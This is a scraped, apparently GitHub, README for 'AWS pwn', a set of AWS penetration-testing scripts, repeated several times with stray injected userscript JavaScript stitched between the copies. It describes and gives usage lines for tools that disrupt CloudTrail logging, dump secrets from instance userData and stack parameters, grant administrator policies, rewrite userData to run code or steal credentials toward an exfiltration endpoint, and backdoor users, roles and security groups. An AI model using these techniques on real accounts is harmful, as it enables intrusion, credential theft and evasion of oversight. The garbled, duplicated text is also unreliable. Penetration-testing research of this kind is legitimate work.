  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do

  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts

About

A collection of AWS penetration testing junk

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Remove or un-stick sticky/fixed headers that block content\n(function() {\n function unstick() {\n document.querySelectorAll('header, nav, [role=\"banner\"], .header, .navbar, .sticky, .fixed-top, [style*=\"position: fixed\"], [style*=\"position:sticky\"]').forEach(function(el) {\n if (el.style.position === 'fixed' || el.style.position === 'sticky' || \n getComputedStyle(el).position === 'fixed' || getComputedStyle(el).position === 'sticky') {\n el.style.position = 'static';\n el.style.top = 'auto';\n el.style.zIndex = 'auto';\n }\n });\n }\n \n unstick();\n \n var observer = new MutationObserver(unstick);\n observer.observe(document.body, { childList: true, subtree: true, attributes: true, attributeFilter: ['style', 'class'] });\n})();", "Kill Sticky Headers"); } } catch(__e) { console.warn('[Userscript:Kill Sticky Headers]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Repository files navigation

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do

  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts

About

A collection of AWS penetration testing junk

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Universal Dark Mode - works on any site\n(function() {\n var enabled = true;\n \n function applyDarkMode() {\n if (!enabled) return;\n \n // Create style element if it doesn't exist\n var style = document.getElementById('universal-dark-mode-style');\n if (!style) {\n style = document.createElement('style');\n style.id = 'universal-dark-mode-style';\n document.head.appendChild(style);\n }\n \n // Dark mode CSS - inverts colors but preserves images/video\n style.textContent = '\n /* Invert everything except media */\n html {\n filter: invert(1) hue-rotate(180deg) !important;\n background: #1a1a2e !important;\n }\n \n /* Restore images, videos, iframes, canvas */\n img, video, iframe, canvas, svg, picture, [style*=\"background-image\"] {\n filter: invert(1) hue-rotate(180deg) !important;\n }\n \n /* Preserve specific elements that should not be inverted */\n .no-dark-mode, .no-dark-mode *,\n [data-theme=\"light\"], [data-theme=\"light\"],\n .ace_editor, .ace_editor *,\n .CodeMirror, .CodeMirror *,\n .monaco-editor, .monaco-editor *,\n .markdown-body pre, .markdown-body pre *,\n .highlight, .highlight *,\n pre code, pre code * {\n filter: none !important;\n }\n \n /* Fix common UI elements */\n .modal, .popup, .dropdown-menu, .tooltip, .popover {\n filter: invert(1) hue-rotate(180deg) !important;\n background: #2d2d44 !important;\n border-color: #444 !important;\n }\n \n /* Scrollbars */\n ::-webkit-scrollbar { background: #1a1a2e !important; }\n ::-webkit-scrollbar-thumb { background: #444 !important; }\n ::-webkit-scrollbar-thumb:hover { background: #555 !important; }\n \n /* Selection */\n ::selection { background: #4ecdc4 !important; color: #1a1a2e !important; }\n ::-moz-selection { background: #4ecdc4 !important; color: #1a1a2e !important; }\n ';\n }\n \n function removeDarkMode() {\n var style = document.getElementById('universal-dark-mode-style');\n if (style) style.remove();\n }\n \n // Toggle with Alt+Shift+D\n document.addEventListener('keydown', function(e) {\n if (e.altKey && e.shiftKey && e.key === 'D') {\n e.preventDefault();\n enabled = !enabled;\n if (enabled) {\n applyDarkMode();\n console.log('[Universal Dark Mode] Enabled');\n } else {\n removeDarkMode();\n console.log('[Universal Dark Mode] Disabled');\n }\n }\n });\n \n // Apply on load\n applyDarkMode();\n \n // Re-apply on dynamic content\n var observer = new MutationObserver(function(mutations) {\n if (enabled && !document.getElementById('universal-dark-mode-style')) {\n applyDarkMode();\n }\n });\n observer.observe(document.head, { childList: true });\n \n console.log('[Universal Dark Mode] Loaded - Press Alt+Shift+D to toggle');\n})();", "Universal Dark Mode"); } } catch(__e) { console.warn('[Userscript:Universal Dark Mode]', __e); } })(); })();
Skip to content

Repository files navigation

AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak but there's been plenty of contributions, most notably Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your aws credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

  • validate_iam_access_keys.py - Given a TSV file of access key + secret [+ session] combinations, checks access validity and returns identity information of the principal.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - Given a text file with one word per line, checks whether the buckets exist and returns basic identifying information.
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - Given a text file of principals (e.g. user/admin, role/deploy), checks whether the principals exist in a given account.
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - Given a text file of account ids and account aliases, checks whether the accounts exist.
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

  • disrupt_cloudtrail.py - Attempts to disrupt/cripple cloudtrail logging in the specified way.
./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

  • dump_account_data.sh - Calls a bunch of generic account-based read/list/get/describe functions and saves the data to a given location. Very noisy but great for a point in time snapshot.
./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

  • dump_instance_attributes.py - Goes through every EC2 instance in the account and retrieves the specified instance attributes. Most commonly used to retrieve userData, which tends to contain secrets.
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - Retrieves the stack descriptions for every existing stack and every stack deleted in the last 90 days. Parameters in stack descriptions often contain passwords and other secrets.
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - Attempts to assume all roles (ARNs) in a file or provided by the list-roles API.
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - Adds the administrator and all action policy to a given user, role, or group. Requires IAM putPolicy or attachPolicy privileges.
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - Bounces a given ec2 instance and rewrites its userData so that you can run arbirtary code or steal temporary instance profile credentials.
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an acccount.

  • rabbit_lambda - An example Lambda function that responds to user delete events by creating more copies of the deleted user.
  • cli_lambda - A lambda function that acts as an aws cli proxy and doesnt require credentials.
  • backdoor_created_users_lambda - A lambda function that adds an access key to each newly created user.
  • backdoor_created_roles_lambda - A lambda function that adds a trust relationship to each newly created role.
  • backdoor_created_security_groups_lambda - A lambda function that adds a given inbound access rule to each newly created security group.
  • backdoor_all_users.py - Adds an access key to every user in the account.
  • backdoor_all_roles.py - Adds a trust relationship to each role in the account. Requires editing the file to set the role ARN.
  • backdoor_all_security_groups.py - Adds a given inbound access rule to each security group in the account. Requires editing the file to set the rule.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either to stupid or too lazy to classify.

  • reserved_words.txt - A list of words/tokens that have some special meaning in AWS or are likely to soon have some special meaning.
  • endpoints.txt - A somewhat up to date list of API endpoints exposed by AWS.
  • integrations.txt - A TSV of services that integrate with AWS via roles or access keys and their account ids, default usernames etc.
  • download_docs.sh - The command line to wget all the AWS docs because I'm stupid and waste time redoing it every time.

To do

  • Add passwords to users for persistence
  • Dump stack resources
  • Validate mfa
  • Add more calls to dump_account_data
  • Add more log disruption methods
  • Create a cloudtrail parsing script for grabbing goodies out of cloudtrail
  • Create an s3 bucket permission enumerator
  • Create tool to grab aws credentials from common places on disk
  • Create cloning tool
  • Create silly privelege escalation tool that uses passrole
  • Validate queues
  • Validate notification topics
  • Fix up persistence scripts to use arguments instead of constants inside the scripts

About

A collection of AWS penetration testing junk

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Used by

Contributors

Languages